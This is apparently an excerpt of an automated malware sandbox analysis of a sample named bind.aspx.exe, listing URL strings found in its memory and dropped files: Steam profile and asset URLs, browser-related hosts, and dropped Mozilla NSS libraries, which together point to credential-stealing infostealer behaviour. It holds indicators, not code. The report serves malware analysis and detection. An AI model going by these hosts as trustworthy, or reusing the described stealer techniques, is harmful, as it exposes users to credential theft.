                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: BKKFHI.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: BKKFHI.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: BKKFHI.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: FBFIJJ.4.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://mozilla.org0/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: 76561199761128941[1].htm.4.drString found in binary or memory: https://steamcommunity.com/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
